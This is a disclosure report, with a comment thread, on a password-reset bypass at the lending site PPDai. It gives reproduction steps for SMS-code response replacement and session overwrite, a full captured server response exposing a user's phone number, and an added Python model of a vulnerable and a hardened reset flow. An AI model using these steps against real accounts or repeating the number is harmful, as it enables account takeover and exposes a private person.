2015-03-13: Details reported to the vendor, awaiting vendor handling
2015-03-13: Vendor has confirmed; details disclosed to the vendor only
2015-03-23: Details disclosed to core white hats and relevant domain experts
2015-04-02: Details disclosed to regular white hats
2015-04-12: Details disclosed to intern white hats
2015-04-27: Details disclosed to the public
Coming home after work in the evening and digging for bugs, what a pleasant thing! Without further ado: PPDai (拍拍贷) has an arbitrary user password reset vulnerability, and not via brute force. For a P2P lending platform this is a devastating class of bug, so please take it seriously! Call me Lei Feng ^_^
a. Simple reproduction method:
1. Register an account with a phone number, then start "forgot password", enter the SMS verification code, get redirected to the reset-password page, and stop there without submitting.
2. In the same browser, open a new window and start "forgot password" for the phone number to be attacked; enter that phone number (*****836*****), send the verification code, then switch back to the reset-password page from step 1 and enter a new password. This resets the attacked account's password.
b. Detailed reproduction method:
1. When recovering a password via phone number, the SMS verification code check can be bypassed.
2. First run a normal password-recovery flow with a phone number you control and record the response returned at the second step (phone verification), as follows:
HTTP/1.1 200 OKServer: gwsDate: Thu, 12 Mar 2015 13:24:23 GMTContent-Type: text/html; charset=utf-8Connection: keep-aliveCache-Control: privateX-Powered: P118Content-Length: 13941<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /><title>重置密码-拍拍贷</title><meta name="description" content="拍拍贷,中国首家,最大、最多人使用的互联网金融P2P(人人贷)网络借贷平台。提供小额贷款,短期贷款,个人贷款,抵押,无抵押贷款服务。利率自定,借期灵活。您还可以成为借出人理财借贷投资,获得高年收益率回报,超低门槛,超高收益。作为可信赖的投融资,理财,贷款,信贷平台,拍拍贷助您财富实现增值" /><meta name="keywords" content="网络贷款,民间借贷,小额贷款,无抵押贷款,信用贷款,网络借贷,借贷平台,拍拍贷,人人贷,投资理财,个人理财,p2p贷款,贷款,互联网金融,投融资" /><link href="http://ac.ppdaicdn.com/css/basic.min.css?v=0fa24dbb3be905897536f38ef8bb0db6" rel="stylesheet" type="text/css" /><link href="http://ac.ppdaicdn.com/css/layout.min.css?v=39e3b26af5ed6b7980896d5ae543f968" rel="stylesheet" type="text/css" /> <link href="http://ac.ppdaicdn.com/css/account.min.css?v=fd821385eca1c3074ae24c641c3147b2" rel="stylesheet" type="text/css" /> <link href="http://ac.ppdaicdn.com/css/bindAccount.min.css?v=9c882c05277b5e73da3ab1d5c81c8a9a" rel="stylesheet" type="text/css" /> <link href="http://ac.ppdaicdn.com/css/validation.min.css" rel="stylesheet" type="text/css" /></head><body> <!--头部--> <div class="PPD_header_nav" style="margin-bottom: 0;"> <div class="PPD_login_status"></div> </div> <div class="mainNav"> <div class="mainNav_inner clearfix w1000center"> <h1 class="logo"> <a href="http://www.ppdai.com/"> <img src="http://ac.ppdaicdn.com/img/logo.png" alt="ppdai logo" /> </a> </h1> <ul id="tabIcon"> <li class="hasSubMenu"> <a href="http://www.ppdai.com/lend">我要投资</a> <div class="subMenu"> <a href="http://www.ppdai.com/lend">我要借出</a> <a href="http://www.ppdai.com/product/list">彩虹计划</a> <a href="http://www.ppdai.com/debtdeal/AlldebtList/DebtList">如何借出</a> <a 
href="http://www.ppdai.com/help/principalprotection">本金保障</a> </div> </li> <li class="hasSubMenu"> <a href="http://www.ppdai.com/borrow">我要借款</a> <div class="subMenu"> <a href="http://www.ppdai.com/borrow">我要借入</a> <a href="http://www.ppdai.com/help/howtoborrow.html">如何借入</a> <a href="http://www.ppdai.com/borrow/interestcalculate">利息计算器</a> </div> </li> <li class="hasSubMenu"> <a href="http://www.ppdai.com/account" class="tabon">我的账户</a> <div class="subMenu"> <a href="http://www.ppdai.com/account/borrow">借款账户</a> <a href="http://www.ppdai.com/account/lend">投资账户</a> </div> </li> <li class="hasSubMenu"> <a href="http://www.ppdai.com/help/aboutus">关于拍拍贷</a> <div class="subMenu"> <a href="http://www.ppdai.com/help/aboutus">关于我们</a> <a href="http://www.ppdai.com/help/howworks">工作原理</a> <a href="http://www.ppdai.com/help/fees">资费说明</a> </div> </li> </ul> </div> </div> <!--头部结束--> <div class="main" style="padding-top: 10px;margin-bottom: 20px;"> <div class="my-frame"> <div class="oneRow"> <h3 class="title">重置密码</h3> <div class="resetPasswprd"> <div class="resetPasswprd_top"> <ul class="clearfix"> <li><a href="/User/ResetPassword?Step=First&Way=Email&Redirect=">用【绑定邮箱】重置密码</a></li> <li><a href="javascript:;" class="current">用【绑定手机】重置密码</a></li> </ul> </div> <form action="/User/ResetPassword" id="resetpassword_mobile" method="POST"> <input type="hidden" name="Redirect" /> <input type="hidden" name="Way" value="Mobile" /> <input type="hidden" name="Step" value="Fourth" /> <input type="hidden" name="Email" value="" /> <input type="hidden" name="MobilePhone" value="13828840869" /> <div class="resetPasswprd_step resetPasswprd_mobilestep3"></div> <div class="resetPasswprd_form"> <ul> <li class="clearfix"> <label>新密码:</label> <input type="password" id="newPassword" name="NewPassword" maxlength="16" data-validation-engine="validate[required ,maxSize[16],minSize[8],custom[password]]" /> <div class="formErrorMsg"></div> <em>请使用8-16个字符的英文字母、符号和数字的组合</em> </li> <li class="clearfix"> 
<label>密码强度:</label> <i id="passstrong" class="weak"></i> </li> <li class="clearfix"> <label>确认新密码:</label> <input type="password" id="confirmPassword" name="NewPasswordConfirm" maxlength="16" data-validation-engine="validate[required ,maxSize[16],minSize[8],custom[password]]" /> <div class="formErrorMsg"></div> <em>请再输入一次新密码</em> </li> </ul> <div class="subBtn"><input type="submit" value="提交" /></div> </div> </form> </div> </div> <p class="formExplain oneRowFormExplain">温馨提示:若无法通过上述方法找回,建议您<a href="/User/Register" target="_blank">重新注册 </a> 。</p> </div></div><input type="hidden" id="hid_formaction" value="/User/ResetPassword" /><input type="hidden" id="hid_code" value="1" /><input type="hidden" id="hid_way" value="Mobile" /><input type="hidden" id="hid_step" value="Fourth" /><input type="hidden" id="hid_email" value="" /><input type="hidden" id="hid_mobile" value="13828840869" /> <!--底部--><div class="footer"> <div class="footer_footerBottom"> <ul class="footer_footerBottomNav clearfix"> <li><span class="webindex"></span><a href="http://www.ppdai.com/">网站首页</a>|</li> <li><span class="aboutus"></span><a href="http://www.ppdai.com/help/aboutus">关于我们</a>|</li> <li><span class="mapsite"></span><a href="http://www.ppdai.com/home/sitemap">网站地图</a>|</li> <li><span class="webservice"></span><a href="http://www.ppdai.com/consult">客服中心</a>|</li> <li class="nomr"><span class="onlneserve"></span><a href="http://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDAyNzUzNV8xODAzNjBfODAwMDI3NTM1XzJf" target="_blank">在线咨询</a></li> </ul> <p>Copyright Reserved 2007-2015©拍拍贷(www.ppdai.com) | 沪ICP备05063398号 | 上海拍拍贷金融信息服务有限公司</p> </div></div><!--底部结束--> <script src="http://ac.ppdaicdn.com/js/jquery.min.js" type="text/javascript" charset="utf-8"></script> <script src="http://ac.ppdai.com/status?v=2014" type="text/javascript" charset="utf-8"></script> <script src="http://ac.ppdaicdn.com/js/init.min.js?v=b4b9062f9a18117bea84881b45c26097" type="text/javascript" charset="utf-8"></script> <script 
type="text/javascript"> $(function () { $(".my-f-l-list li a.on").closest(".my-f-l-list").prev(".my-f-l-nav").addClass("my-f-l-nav-sd"); }); </script> <script src="http://ac.ppdaicdn.com/js/jquery.cookie.min.js" type="text/javascript" charset="utf-8"></script><script src="http://ac.ppdaicdn.com/js/ppd_ac_utils.min.js?v=4b976b80b529343bf5bc44c69f2240ab" type="text/javascript" charset="utf-8"></script><script src="http://ac.ppdaicdn.com/js/validation.min.js" type="text/javascript" charset="utf-8"></script><script src="http://ac.ppdaicdn.com/js/validation-zh.min.js" type="text/javascript" charset="utf-8"></script><script type="text/javascript">$(function () { var acUtils = new PPDAcUtils("v1.0"); var code = $('#hid_code').val(); var way = $('#hid_way').val(); var step = $('#hid_step').val(); var email = $('#hid_email').val(); var mobile = $('#hid_mobile').val(); var remainTimeKey = way + '_resetpwd_remainTime'; var cookieObj = { expires: 1 / 24 / 60, path: '/', domain: '.ac.ppdai.com', secure: false }; $("#resetpassword_mobile").validationEngine(); $("#resetpassword_email").validationEngine(); function checkRemainTime(obj) { if (jQuery.cookie(remainTimeKey) && jQuery.cookie(remainTimeKey).length > 0) { acUtils.remainTime(obj, jQuery.cookie(remainTimeKey), null, '秒后重新发送', remainTimeKey, cookieObj); } } function init() { if ($('.getemailvalidata').length > 0) { checkRemainTime('.getemailvalidata'); if (step == 'Second') { $obj = $('.getemailvalidata'); if ($obj.attr('disabled') != 'disabled') { sendCode($obj); } } } else if ($('.getmobilevalidata').length > 0) { checkRemainTime('.getmobilevalidata'); if (step == 'Second') { $obj = $('.getmobilevalidata'); if ($obj.attr('disabled') != 'disabled') { sendCode($obj); } } } else { // } } setTimeout(init, 10); //第二步:邮箱/手机验证码 var sendCode = function ($obj) { acUtils.remainTime($obj, 60, null, '秒后重新发送', remainTimeKey, cookieObj); var formaction = $('#hid_formaction').val(); $.post(formaction, { Step: "Second", Way: way, Email: 
email, MobilePhone: mobile, IsAsync: true }, function (data) { if (data.Code == 1) { //acUtils.remainTime($obj, 60, null, '秒后重新发送', remainTimeKey, cookieObj); } else { alert(data.Message); } }); } $('.getemailvalidata, .getmobilevalidata').click(function () { sendCode($(this)); }); var passLength = function (s, minLen, $showObj) { if (s.length < minLen) { $showObj.removeAttr("class").addClass('weak'); return; } var a = -1; if (s.match(/[a-z]/ig)) { a++; } if (s.match(/[0-9]/ig)) { a++; } if (s.match(/(.[^a-z0-9])/ig)) { a++; } if (s.length < 6 && a > 0) { a--; } switch (a) { case 0: $showObj.removeAttr("class").addClass('weak'); break; case 1: $showObj.removeAttr("class").addClass('medium'); break; case 2: $showObj.removeAttr("class").addClass('strong'); break; default: $showObj.removeAttr("class").addClass('weak'); } }; $('#newPassword').bind('input propertychange', function () { passLength($('#newPassword').val(), 6, $('#passstrong')); });});</script> <!-- Google Tag Manager --> <noscript> <iframe src="//www.googletagmanager.com/ns.html?id=GTM-PVQ5D8" height="0" width="0" style="display: none; visibility: hidden"></iframe> </noscript> <script>(function (w, d, s, l, i) { w[l] = w[l] || []; w[l].push({ 'gtm.start': new Date().getTime(), event: 'gtm.js' }); var f = d.getElementsByTagName(s)[0], j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src = '//www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f);})(window, document, 'script', 'dataLayer', 'GTM-PVQ5D8');</script><!-- End Google Tag Manager --> <script type="text/javascript"> var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://"); document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fcfc74b94210e27ea643566ddece504a7' type='text/javascript'%3E%3C/script%3E")); </script></body></html>
3. Run the password-recovery flow again, as shown in the figure below, entering the correct phone number and verification code to proceed to the next step.
4. At the second step, submit an arbitrary SMS code (here 111111); an error response is returned, as follows:
5. Replace that response with the response captured from the first password-reset operation, as follows:
6. After releasing the request, the reset-password page appears; reset the password to 1111qqqq.
7. The password reset succeeds, and the new password can be used to log into the system.
See the vulnerability details above. The account below appears to belong to one of your investors.
Fix suggestion: strengthen the authentication mechanism.
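The root cause the report and the comment thread point at is that the server remembers "an SMS code was verified" separately from "which phone number was verified", and that the session state is identified purely by cookie, so a later send-code request for another number overwrites the phone while the verified flag survives. The following is an added example (not PPDai's code, whose server-side implementation is not shown on this page); it models that weak pattern as a small Python state machine beside a hardened version in which verification yields a single-use, time-limited reset ticket bound to the verified phone. Class names, session cookie values, phone numbers and passwords are all constructed for the demonstration; the exact server design is an assumption inferred from the report's "simple method" and the "cookie overwritten twice" comment.

```python
"""Added example: weak versus hardened phone-based password-reset flow.
Not the page's or the vendor's code; all data below is constructed."""
import hmac
import secrets
import time

# Constructed sample accounts: phone number -> current password.
ACCOUNTS = {"13800000001": "victim-old-pw", "13800000002": "attacker-old-pw"}


class VulnerableResetFlow:
    """Weak pattern (assumed from the report): the session stores the phone
    from the *latest* send-code request and a separate 'verified' flag.
    Nothing ties the flag to the phone that was actually verified."""

    def __init__(self, accounts):
        self.accounts = dict(accounts)
        self.sessions = {}   # session cookie -> {"phone": str, "verified": bool}
        self.sms_codes = {}  # phone -> last code sent (stands in for the SMS gateway)

    def send_code(self, session, phone):
        code = f"{secrets.randbelow(10**6):06d}"
        self.sms_codes[phone] = code
        state = self.sessions.setdefault(session, {"verified": False})
        state["phone"] = phone   # overwrites the phone; 'verified' is left untouched
        return code              # returned only so the demo can read its own SMS

    def verify_code(self, session, code):
        state = self.sessions.get(session)
        if state and self.sms_codes.get(state.get("phone")) == code:
            state["verified"] = True
            return True
        return False

    def set_password(self, session, _proof, new_password):
        # The final form carries no secret from the verification step, so
        # there is nothing to check beyond the session flag.
        state = self.sessions.get(session)
        if not state or not state.get("verified"):
            return False
        self.accounts[state["phone"]] = new_password  # whatever phone is in the session now
        return True


class HardenedResetFlow:
    """Hardened pattern: verifying a code produces a single-use, time-limited
    ticket bound to the verified phone; the final step trusts only that ticket."""

    TICKET_TTL = 600  # seconds a verified reset stays usable

    def __init__(self, accounts):
        self.accounts = dict(accounts)
        self.sessions = {}
        self.sms_codes = {}

    def send_code(self, session, phone):
        code = f"{secrets.randbelow(10**6):06d}"
        self.sms_codes[phone] = code
        # Any new send-code request discards all earlier progress in this session.
        self.sessions[session] = {"phone": phone}
        return code

    def verify_code(self, session, code):
        state = self.sessions.get(session)
        if not state:
            return False
        expected = self.sms_codes.pop(state["phone"], None)  # each code is usable once
        if expected is None or not hmac.compare_digest(expected, code):
            return False
        ticket = secrets.token_urlsafe(32)
        self.sessions[session] = {"phone": state["phone"], "ticket": ticket,
                                  "expires": time.time() + self.TICKET_TTL}
        return ticket

    def set_password(self, session, ticket, new_password):
        state = self.sessions.pop(session, None)  # consumed whether or not it succeeds
        if not state or "ticket" not in state or time.time() > state["expires"]:
            return False
        if not isinstance(ticket, str) or not hmac.compare_digest(state["ticket"], ticket):
            return False
        self.accounts[state["phone"]] = new_password  # phone comes from server state only
        return True


def overwrite_scenario(flow_cls):
    """Replays the report's 'simple method' against a flow: verify one's own
    phone, request a code for another phone in the same session, then submit
    a new password. Returns (other account's password, own password)."""
    flow = flow_cls(ACCOUNTS)
    session, own, other = "cookie-abc", "13800000002", "13800000001"
    proof = flow.verify_code(session, flow.send_code(session, own))
    flow.send_code(session, other)  # the "second window" request
    flow.set_password(session, proof, "new-pw")
    return flow.accounts[other], flow.accounts[own]


def legitimate_reset(flow_cls):
    """A normal reset of one's own account; returns the resulting password."""
    flow = flow_cls(ACCOUNTS)
    session, phone = "cookie-xyz", "13800000002"
    proof = flow.verify_code(session, flow.send_code(session, phone))
    flow.set_password(session, proof, "new-pw")
    return flow.accounts[phone]


if __name__ == "__main__":
    print("vulnerable:", overwrite_scenario(VulnerableResetFlow))  # victim's password changes
    print("hardened:  ", overwrite_scenario(HardenedResetFlow))    # nothing changes
```

The hardened flow stops both variants described in the report: the session-overwrite trick fails because a new send-code request wipes the ticket, and a replayed "success" response from an earlier verification is useless because the final step checks a server-held ticket that the response body never contained. In a real deployment the ticket would live in server-side storage keyed by account rather than by cookie, and a successful reset should also invalidate the account's other sessions.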
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-03-13 18:44
Many thanks for the report! This vulnerability has been fixed.
None for now
Your method is too complicated; there is a simpler way.
Mind-blowing.
@浩天 Just edit the simple method in directly.
Following.
OK.
@浩天 Please share the simple method, master.
@恋锋 You should be able to see it now, and the vendor should read it carefully too; it has overturned my outlook on life and on security.
@浩天 Can this be marked as featured? Heh.
@浩天 At the vendor's request, some sensitive fields in the vulnerability description have been masked; please review!
Can we name it "async reset"? Hahaha~
... A bit confused.. mind-blowing.
@恋峰 @浩天 My own understanding: intercept the response with Fiddler, replace the failed response with the earlier successful response, then run it, and the reset-password page shows up? And the new password can be submitted directly from that page? What kind of weird bug is this....
This is beyond my understanding; can someone comment on it?
@孔卡 The cookie gets overwritten a second time, and identity is determined by the cookie.
@浩天 Why do I feel this is the same trick as this vulnerability: WooYun: 展程科技官网后台奇葩漏洞(任意账号均可登陆)? Hehe, reply when you have time, big shot. @恋锋 you can reply too. If it is the same as that one, it is much easier to understand.
@孔卡 You can understand it that way.